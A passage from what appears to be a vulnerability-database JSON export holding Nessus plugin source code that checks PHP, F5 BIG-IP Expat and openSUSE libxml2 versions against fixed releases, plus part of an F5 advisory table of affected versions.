or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^7(\\.1)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^7\\.1\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 7.1.x\", port);\n\nfix = \"7.1.11\";\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-17T19:18:49", "bulletinFamily": "scanner", "description": "According to its banner, the version of PHP running on the remote \nweb server is 7.0.x prior to 7.0.25. 
It is, therefore, affected by \nmultiple vulnerabilities.", "modified": "2019-11-02T00:00:00", "id": "PHP_7_0_25.NASL", "href": "https://www.tenable.com/plugins/nessus/104632", "published": "2017-11-16T00:00:00", "title": "PHP 7.0.x < 7.0.25 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104632);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2016-1283\", \"CVE-2017-16642\");\n script_bugtraq_id(79825, 101745);\n\n script_name(english:\"PHP 7.0.x < 7.0.25 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of PHP running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote \nweb server is 7.0.x prior to 7.0.25. 
It is, therefore, affected by \nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://php.net/ChangeLog-7.php#7.0.25\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 7.0.25 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1283\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^7(\\.0)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^7\\.0\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 7.0.x\", port);\n\nfix = \"7.0.25\";\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-17T19:18:48", "bulletinFamily": "scanner", "description": "According to its banner, the version of PHP running on the remote \nweb server is 5.6.x prior to 5.6.32. 
It is, therefore, affected by \nmultiple vulnerabilities.", "modified": "2019-11-02T00:00:00", "id": "PHP_5_6_32.NASL", "href": "https://www.tenable.com/plugins/nessus/104631", "published": "2017-11-16T00:00:00", "title": "PHP 5.6.x < 5.6.32 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104631);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2016-1283\", \"CVE-2017-16642\");\n script_bugtraq_id(79825, 101745);\n\n script_name(english:\"PHP 5.6.x < 5.6.32 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of PHP.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of PHP running on the remote web server is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of PHP running on the remote \nweb server is 5.6.x prior to 5.6.32. 
It is, therefore, affected by \nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/ChangeLog-5.php#5.6.32\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 5.6.32 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-1283\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_keys(\"www/PHP\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\n# Check that it is the correct version of PHP\nif (version =~ \"^5(\\.6)?$\") audit(AUDIT_VER_NOT_GRANULAR, \"PHP\", port, version);\nif (version !~ \"^5\\.6\\.\") audit(AUDIT_NOT_DETECT, \"PHP version 5.6.x\", port);\n\nfix = \"5.6.32\";\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n Version source : ' + source +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:26:23", "bulletinFamily": "scanner", "description": "An out-of-bounds read flaw was found in the way Expat processed\ncertain input. 
A remote attacker could send specially crafted XML\nthat, when parsed by an application using the Expat library, would\ncause that application to crash or, possibly, execute arbitrary code\nwith the permission of the user running the\napplication. (CVE-2016-0718)\n\nImpact\n\nA remote attacker could send specially crafted XML which, when parsed\nby an application using the Expat library, would cause that\napplication to stop responding or possibly run arbitrary code with the\npermission of the user running the application.\n\nBIG-IP ASM control plane\n\nAn authenticated user with the relevant privileges, such as Web\nApplication Security Editor, can exploit the vulnerability and gain\nfull control of the system.\n\nbig3d/gtmd\n\nThe big3d / gtmd processes may be exposed to this vulnerability over\nthe management port and self IP addresses when the Port Lockdown\nsetting is set to Default, All, or Custom with TCP port 4353\nincluded. The impact for the big3d process is a temporary disruption\nin the communication between peer systems until the system\nautomatically restarts the big3d process.", "modified": "2019-11-02T00:00:00", "id": "F5_BIGIP_SOL52320548.NASL", "href": "https://www.tenable.com/plugins/nessus/103313", "published": "2017-09-19T00:00:00", "title": "F5 Networks BIG-IP : Expat vulnerability (K52320548)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K52320548.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103313);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2019/01/04 10:03:41\");\n\n script_cve_id(\"CVE-2016-0718\");\n\n script_name(english:\"F5 Networks BIG-IP : Expat vulnerability (K52320548)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote
device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An out-of-bounds read flaw was found in the way Expat processed\ncertain input. A remote attacker could send specially crafted XML\nthat, when parsed by an application using the Expat library, would\ncause that application to crash or, possibly, execute arbitrary code\nwith the permission of the user running the\napplication. (CVE-2016-0718)\n\nImpact\n\nA remote attacker could send specially crafted XML which, when parsed\nby an application using the Expat library, would cause that\napplication to stop responding or possibly run arbitrary code with the\npermission of the user running the application.\n\nBIG-IP ASM control plane\n\nAn authenticated user with the relevant privileges, such as Web\nApplication Security Editor, can exploit the vulnerability and gain\nfull control of the system.\n\nbig3d/gtmd\n\nThe big3d / gtmd processes may be exposed to this vulnerability over\nthe management port and self IP addresses when the Port Lockdown\nsetting is set to Default, All, or Custom with TCP port 4353\nincluded.
The impact for the big3d process is a temporary disruption\nin the communication between peer systems until the system\nautomatically restarts the big3d process.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K52320548\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K52320548.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n
script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! 
get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K52320548\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.5.7\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.3.2\",\"11.5.7\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# 
LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\",\"11.2.1\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.3\",\"11.6.0-11.6.3\",\"11.4.1-11.5.6\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"13.1.0\",\"13.0.1\",\"12.1.3.2\",\"11.6.3.2\",\"11.5.7\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T03:01:56", "bulletinFamily": "scanner", "description": "This update for libxml2 fixes the following issues :\n\n - CVE-2017-9047, CVE-2017-9048: The function\n xmlSnprintfElementContent in valid.c was vulnerable to a\n stack-based buffer overflow (bsc#1039063, bsc#1039064)\n\n - CVE-2017-9049: The function xmlDictComputeFastKey in\n dict.c was vulnerable to a heap-based buffer over-read.\n (bsc#1039066)\n\n - CVE-2017-9050: The function xmlDictAddString was\n vulnerable to a heap-based buffer over-read\n (bsc#1039661)\n\n - CVE-2016-1839: heap-based buffer overflow\n (xmlDictAddString func) (bnc#1039069)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2017-663.NASL", "href": "https://www.tenable.com/plugins/nessus/100708", "published": "2017-06-09T00:00:00", "title": "openSUSE Security Update : libxml2 (openSUSE-2017-663)", "type": "nessus", "sourceData": 
"#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-663.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100708);\n script_version(\"3.3\");\n script_cvs_date(\"Date: 2019/04/10 16:10:18\");\n\n script_cve_id(\"CVE-2016-1839\", \"CVE-2017-9047\", \"CVE-2017-9048\", \"CVE-2017-9049\", \"CVE-2017-9050\");\n\n script_name(english:\"openSUSE Security Update : libxml2 (openSUSE-2017-663)\");\n script_summary(english:\"Check for the openSUSE-2017-663 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for libxml2 fixes the following issues :\n\n - CVE-2017-9047, CVE-2017-9048: The function\n xmlSnprintfElementContent in valid.c was vulnerable to a\n stack-based buffer overflow (bsc#1039063, bsc#1039064)\n\n - CVE-2017-9049: The function xmlDictComputeFastKey in\n dict.c was vulnerable to a heap-based buffer over-read.\n (bsc#1039066)\n\n - CVE-2017-9050: The function xmlDictAddString was\n vulnerable to a heap-based buffer over-read\n (bsc#1039661)\n\n - CVE-2016-1839: heap-based buffer overflow\n (xmlDictAddString func) (bnc#1039069)\n\nThis update was imported from the SUSE:SLE-12-SP2:Update update\nproject.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039063\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039066\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039069\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1039661\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=981114\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libxml2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-2-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libxml2-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-libxml2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:python-libxml2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:python-libxml2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libxml2-2-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libxml2-2-debuginfo-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libxml2-debugsource-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libxml2-devel-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", 
reference:\"libxml2-tools-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libxml2-tools-debuginfo-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"python-libxml2-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"python-libxml2-debuginfo-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"python-libxml2-debugsource-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libxml2-2-32bit-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libxml2-2-debuginfo-32bit-2.9.4-5.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", cpu:\"x86_64\", reference:\"libxml2-devel-32bit-2.9.4-5.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libxml2-2 / libxml2-2-32bit / libxml2-2-debuginfo / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "f5": [{"lastseen": "2019-12-08T11:26:39", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned IDs 630446 and 674189 (BIG-IP) and ID 677266 (Enterprise Manager) to this vulnerability. 
Additionally, [BIG-IP iHealth](<http://www.f5.com/support/support-tools/big-ip-ihealth/>) may list Heuristic H52320548 on the **Diagnostics** > **Identified** > **High** page.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP AAM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP AFM | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 | 13.1.0 \n13.0.1 \n12.1.3.2 \n11.6.3.2 \n11.5.7 | High | iControl SOAP, eventd \nBIG-IP Analytics | 13.0.0 \n12.0.0 - 12.1.3 \n11.6.0 - 11.6.3 \n11.4.1 - 11.5.6 \n11.2.1 | 13.1.0 